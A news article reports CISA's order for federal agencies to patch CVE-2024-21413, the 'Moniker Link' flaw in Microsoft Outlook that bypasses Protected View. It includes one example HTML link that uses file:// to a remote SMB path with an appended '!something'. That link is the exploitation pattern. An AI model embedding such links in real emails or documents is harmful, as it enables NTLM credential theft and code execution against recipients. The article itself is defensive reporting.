CISA Urges U.S. Federal Agencies to Secure Systems Against Critical Microsoft Outlook Vulnerability
The Cybersecurity and Infrastructure Security Agency (CISA) issued a warning to U.S. federal agencies, urging them to secure their systems against ongoing attacks exploiting a critical remote code execution (RCE) vulnerability in Microsoft Outlook.
This vulnerability, identified by Check Point researcher Haifei Li and tracked as CVE-2024-21413, arises from improper input validation when opening emails containing malicious links in affected Outlook versions. Exploiting this flaw allows attackers to bypass Protected View—a security feature designed to block harmful content by opening files in read-only mode—and execute malicious Office files in editing mode.
Microsoft initially patched CVE-2024-21413 one year ago, highlighting that the Preview Pane also serves as an attack vector, enabling exploitation even when merely previewing maliciously crafted Office documents.
According to Check Point, this vulnerability—referred to as “Moniker Link”—allows threat actors to circumvent built-in Outlook protections by embedding malicious links using the file:// protocol and appending an exclamation mark followed by random text to URLs pointing to attacker-controlled servers. For example:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
CVE-2024-21413 affects multiple Microsoft Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019. Successful exploitation can lead to NTLM credential theft and arbitrary code execution via specially crafted Office documents.
CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, marking it as actively exploited. Under Binding Operational Directive (BOD) 22-01, federal agencies are required to secure their systems within three weeks, by February 27, 2025.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” CISA warned.
While CISA primarily alerts federal agencies to vulnerabilities requiring urgent mitigation, private organizations are also strongly advised to prioritize patching to prevent potential attacks.
Reference:
Critical RCE bug in Microsoft Outlook now exploited in attacks – BleepingComputer
